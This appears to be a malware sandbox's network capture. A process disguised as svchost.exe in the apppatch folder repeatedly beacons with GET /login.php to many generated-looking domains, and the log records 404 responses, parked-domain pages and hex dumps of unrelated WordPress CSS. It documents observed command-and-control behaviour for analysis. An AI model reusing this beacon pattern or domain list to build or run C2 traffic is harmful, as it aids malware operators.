                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Sep 8, 2024 10:54:13.908184052 CEST  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Sep 8, 2024 10:54:14.230428934 CEST | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:54:14 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.9 | 57355 | 199.59.243.226 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:54:13.913089991 CEST | 350 | OUT | GET /login.php?subid1=20240908-1854-12c0-8240-bdabdc5d8efa HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1725785613.7387215
Sep 8, 2024 10:54:14.398124933 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:13 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1226
                                                                                                                                                                                                          x-request-id: 21d686d4-2b53-4837-b130-d05a6b735fbd
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OFKPQUU/BnWsdoATIezOPJPYzG/H4lUQfiveIE+6wfUBvddoUo1a+OJ8llGG3QEObOpBXIHY3R5kZbYWKb3MOQ==
                                                                                                                                                                                                          set-cookie: parking_session=21d686d4-2b53-4837-b130-d05a6b735fbd; expires=Sun, 08 Sep 2024 09:09:14 GMT; path=/
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OFKPQUU/BnWsdoATIezOPJPYzG/H4lUQfiveIE+6wfUBvddoUo1a+OJ8llGG3QEObOpBXIHY3R5kZbYWKb3MOQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Sep 8, 2024 10:54:14.398145914 CEST | 660 | IN
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjFkNjg2ZDQtMmI1My00ODM3LWIxMzAtZDA1YTZiNzM1ZmJkIiwicGFnZV90aW1lIjoxNzI1Nzg1NjU0LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.9 | 57356 | 64.190.63.136 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:54:13.974905014 CEST | 348 | OUT | GET /login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1725785614.8678415
Sep 8, 2024 10:54:14.635535002 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:54:14 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hxSxi4PBFmu0QNc2q+GSknygYkKo1n+KSAULi9DWq5iuwMw/XopOCCWE/U3DldKAcurRnNAvl7kzIkhxTkuCVw==
                                                                                                                                                                                                          last-modified: Sun, 08 Sep 2024 08:54:14 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7768d5b45d-sb6gc
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Ascii: 87E<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hxSxi4PBFmu0QNc2q+GSknygYkKo1n+KSAULi9DWq5iuwMw/XopOCCWE/U3DldKAcurRnNAvl7kzIkhxTkuCVw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.9 | 57054 | 72.52.179.174 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:54:17.250695944 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.9 | 57055 | 72.52.179.174 | 80 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 10:54:17.762475967 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49720 | 188.114.96.3 | 443 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 08:52:35 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-09-08 08:52:36 UTC | 769 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:36 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T47TxWVx2O1M5cbssqArJpdhX7PwAwX6T2MVHPd6OO2G0G3sc9VfxLvf7i%2Bpttk5GXvDg%2BUPRmAUWVFCIp2TfkTiR%2BS%2Bj%2BSV8V44H42ml2Mp%2FnHmKOz5uk%2FuT%2FGWUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb40c9d2c8c3c-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49722 | 188.114.96.3 | 443 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 08:52:38 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-09-08 08:52:39 UTC | 759 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:39 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5uCX5xsqR1nBqM0Ng1KwQUjFByFqE2uKX%2BU7ovCRO50o3vth3IOc85p0nYztAHWSyWyocDzTAidxjdEHXrDknyCjDq6WTYS1wN1ztUSvqTTuXTXYo%2FLcM%2FaGKuIPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb41b8afd4373-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Ascii: 04;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page-l
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e
                                                                                                                                                                                                          Data Ascii: le-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post .
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 5d 20
                                                                                                                                                                                                          Data Ascii: cus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"]
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 3a 66 6f 63 75 73 2c 23 61 73 74 2d 63 6f 75 70 6f 6e 2d 63 6f 64 65 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 2e 71 75 61 6e 74 69 74 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 66 6f 63 75
                                                                                                                                                                                                          Data Ascii: nt .woocommerce form .form-row .select2-container--default .select2-selection--single:focus,#ast-coupon-code:focus,.woocommerce.woocommerce-js .quantity input[type=number]:focus,.woocommerce-js .woocommerce-mini-cart-item .quantity input[type=number]:focu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49746 | 188.114.96.3 | 443 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 08:53:19 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-09-08 08:53:20 UTC | 892 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:20 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="45.6",amp_style_sanitizer;dur="23.2",amp_tag_and_attribute_sanitizer;dur="13.2",amp_optimizer;dur="7.5"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P0BSGN8ltweW1QkLmDeiDFh3RZtcLJndyFskVj6NxKLedPRbrU0Y2MxHydwSdQ7QhCMYrd02CmTqqaAiec0KTCtRUmoDgZwjnH459s5VAs7D7b2KwlHadWzLkfq8Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb51afbd63338-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49748 | 188.114.96.3 | 443 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 08:53:21 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-09-08 08:53:22 UTC | 902 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:22 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="47.8",amp_style_sanitizer;dur="22.5",amp_tag_and_attribute_sanitizer;dur="21.3",amp_optimizer;dur="4.2"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUXgMjfBq6S2attjTSB7E3iwucP5Hrp9kcsDsELpFuYefC%2BhQmkzn1i7Unw8GjZfPvVqd%2BfvkjYGJYaNnPG3rJYDmRUXZ%2Bz%2BOnwiHwVTmJpIW%2Bct8EhO9gS8DhPx5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb5284f776a57-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 57343 | 188.114.96.3 | 443 | 1512 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-08 08:53:54 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-09-08 08:53:55 UTC | 759 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:55 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1Tqm34XKyKNkTfHmQXQgrCQLSo9xhcLIhpY4fHRotCBwUO182%2B95GoYFaR6UlGI2z1O6fq8qUNkkUDvfq1PMBf5kNwce5q%2F9UTXqAWlIcaG4mjruW%2BTduDzdBVatA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb5f73a864376-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Ascii: le-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post .
                                                                                                                                                                                                          2024-09-08 08:53:55 UTC1369INData Raw: 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 5d 20
                                                                                                                                                                                                          Data Ascii: cus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 57344 | 188.114.96.3 | 443 | 1512 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-08 08:53:56 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-09-08 08:53:57 UTC | 755 | IN | HTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 08:53:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6yxmMiz0GykYnaZPBg3WIoUaAnjjJuMALy1zU5jybloHK0GPi17pSpNIgLmEUWoXVYDC30Z06LEXJNeIC730O98m4tjita1Cm4KdKlYO72txqG%2F4rqXZpcMckmtktA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bfdb6060f4a1895-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 57350 | 188.114.96.3 | 443 | 1512 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-08 08:54:06 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Connection: Keep-Alive
2024-09-08 08:54:07 UTC | 896 | IN | HTTP/1.1 404 Not Found
Date: Sun, 08 Sep 2024 08:54:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="41.7",amp_style_sanitizer;dur="21.8",amp_tag_and_attribute_sanitizer;dur="16.6",amp_optimizer;dur="4.8"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uerRVSqKt9lueXUYBU1HDW%2F7kPvuN196fpS15TKckOB7Cvm6G1a7GPXqG%2BvykSHqiP6vN1i8ivaCpi29YXa4hfAEx2JRsvh1xIB4zkXPq5EXeDBH508UYot9dCDdA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bfdb6447bf543df-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Ascii: ]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][height]
